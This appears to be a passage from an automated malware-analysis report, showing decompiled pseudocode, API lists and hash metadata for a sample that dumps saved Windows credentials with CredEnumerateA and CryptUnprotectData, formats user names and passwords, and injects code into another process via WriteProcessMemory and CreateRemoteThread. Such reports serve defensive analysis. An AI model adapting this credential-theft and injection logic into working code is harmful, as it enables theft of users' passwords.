				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t241;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t238 = _t236;
				_t233 = 0x25;
				_t81 =  &_v151;
				_t191 =  &_v114;
				do {
					 *_t191 = 0 << 2;
					_t191 = _t191 + 2;
					_t81 = _t81 + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t86 = _v12 - 1;
				if(_t86 >= 0) {
					_v40 = _t86 + 1;
					_t234 = 0;
					do {
						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
						_v20 =  *((intOrPtr*)(_t121 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t238);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t174 = _v24;
						E00401D9C( &_v168, "User: ",  *_t238);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t187);
						E0040234C(_v180, _t187, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t238, _v160);
						E00401D9C( &_v192, "Password: ",  *_t238);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t160 = E00402274(_v204);
						_push(_t160 - _t222);
						E00402218( &_v208, _t174);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t174);
						_pop(_t226);
						_pop(_t189);
						E0040234C(_v212, _t189, _t226, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t238, _v184);
						_t234 = _t234 + 1;
						_t60 =  &_v40;
						 *_t60 = _v40 - 1;
						_t249 =  *_t60;
					} while ( *_t60 != 0);
				}
				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
				E00401B14(_t238, _v216);
				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
				E00401B14(_t238, _v220);
				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
				E00401B14(_t238, _v224);
				_pop(_t198);
				 *[fs:eax] = _t198;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t203 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t203);
			}


















































                                    0x0040930b
                                    0x0040930b
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930C, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t79;
				void* _t84;
				intOrPtr _t119;
				void* _t158;
				void* _t173;
				void* _t185;
				void* _t187;
				short* _t188;
				intOrPtr _t195;
				intOrPtr _t200;
				void* _t223;
				void* _t230;
				signed int _t231;
				void* _t233;
				intOrPtr* _t235;
				intOrPtr _t237;
				intOrPtr _t238;

				_t172 = __ebx;
				_t237 = _t238;
				_t173 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t173 = _t173 - 1;
				} while (_t173 != 0);
				_push(_t173);
				_push(__ebx);
				_t233 = __eax;
				_push(_t237);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t238;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t235 = _t233;
				_t230 = 0x25;
				_t79 =  &_v151;
				_t188 =  &_v114;
				do {
					 *_t188 = 0 << 2;
					_t188 = _t188 + 2;
					_t79 = _t79 + 1;
					_t230 = _t230 - 1;
				} while (_t230 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t84 = _v12 - 1;
				if(_t84 >= 0) {
					_v40 = _t84 + 1;
					_t231 = 0;
					do {
						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
						_v20 =  *((intOrPtr*)(_t119 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t235);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t172 = _v24;
						E00401D9C( &_v168, "User: ",  *_t235);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t185);
						E0040234C(_v180, _t185, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t235, _v160);
						E00401D9C( &_v192, "Password: ",  *_t235);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t158 = E00402274(_v204);
						_push(_t158 - _t219);
						E00402218( &_v208, _t172);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t172);
						_pop(_t223);
						_pop(_t187);
						E0040234C(_v212, _t187, _t223, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t235, _v184);
						_t231 = _t231 + 1;
						_t58 =  &_v40;
						 *_t58 = _v40 - 1;
						_t245 =  *_t58;
					} while ( *_t58 != 0);
				}
				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
				E00401B14(_t235, _v216);
				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
				E00401B14(_t235, _v220);
				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
				E00401B14(_t235, _v224);
				_pop(_t195);
				 *[fs:eax] = _t195;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t200 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t200);
			}

















































                                    0x0040930c
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AD5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed char _t43;
				long* _t50;
				intOrPtr _t66;
				intOrPtr _t71;
				void* _t76;
				void* _t94;
				intOrPtr _t103;
				intOrPtr _t104;
				signed char _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				char* _t117;
				void* _t119;

				asm("adc [edx], eax");
				_t43 =  *__eax ^  *[cs:ecx];
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *__ecx =  *__ecx + __edx;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				asm("adc [eax], al");
				_t115 = __esi | _a73;
				_t117 =  &_a1;
				asm("aaa");
				_pop(_t111);
				asm("arpl [gs:edi+0x64], bp");
				_push(_t117);
				_push(_t117);
				_push(_t115);
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t116 = __edx;
				_t112 = _t43;
				_push(_t119);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119 + 0xffffffd8;
				_t94 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t50 = _v8;
				_push(_t50);
				L00408978();
				if(_t50 != 0) {
					_push(0);
					E00402218( &_v28, _t112);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t112);
					_t66 = _v12;
					_push(_t66);
					L00408980();
					if(_t66 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t71 = _v12;
						_push(_t71);
						L00408970();
						if(_t71 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t76 = _v20 - 1;
							if(_t76 >= 0) {
								_v24 = _t76 + 1;
								_t113 = 0;
								do {
									_t94 = _t94 +  *(_v16 + _t113);
									_v40 =  *(_v16 + _t113) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
									E00401D58(_t116, _v32);
									_t113 = _t113 + 1;
									_t30 =  &_v24;
									 *_t30 = _v24 - 1;
								} while ( *_t30 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
							E00401D58(_t116, _v44);
						}
					}
				}
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t104 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t104);
			}



























                                    0x00408ad8
                                    0x00408ada
                                    0x00408add
                                    0x00408adf
                                    0x00408ae1
                                    0x00408ae3
                                    0x00408ae5
                                    0x00408ae7
                                    0x00408ae9
                                    0x00408aec
                                    0x00408aef
                                    0x00408af0
                                    0x00408af1
                                    0x00408af2
                                    0x00408af7
                                    0x00408af8
                                    0x00408aff
                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AF8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				long* _t47;
				intOrPtr _t63;
				intOrPtr _t68;
				void* _t73;
				void* _t91;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t114;

				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t111 = __edx;
				_t108 = __eax;
				_push(_t114);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114 + 0xffffffd8;
				_t91 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t47 = _v8;
				_push(_t47);
				L00408978();
				if(_t47 != 0) {
					_push(0);
					E00402218( &_v28, _t108);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t108);
					_t63 = _v12;
					_push(_t63);
					L00408980();
					if(_t63 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t68 = _v12;
						_push(_t68);
						L00408970();
						if(_t68 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t73 = _v20 - 1;
							if(_t73 >= 0) {
								_v24 = _t73 + 1;
								_t109 = 0;
								do {
									_t91 = _t91 +  *(_v16 + _t109);
									_v40 =  *(_v16 + _t109) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
									E00401D58(_t111, _v32);
									_t109 = _t109 + 1;
									_t29 =  &_v24;
									 *_t29 = _v24 - 1;
								} while ( *_t29 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
							E00401D58(_t111, _v44);
						}
					}
				}
				_pop(_t99);
				 *[fs:eax] = _t99;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t100 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t100);
			}
























                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AF08, Relevance: 10.6, APIs: 7, Instructions: 70injectionmemorythreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}














                                    0x0040af0f
                                    0x0040af13
                                    0x0040af16
                                    0x0040af1a
                                    0x0040af25
                                    0x0040af2b
                                    0x0040af2c
                                    0x0040af30
                                    0x0040af31
                                    0x0040af34
                                    0x0040af3b
                                    0x0040af3e
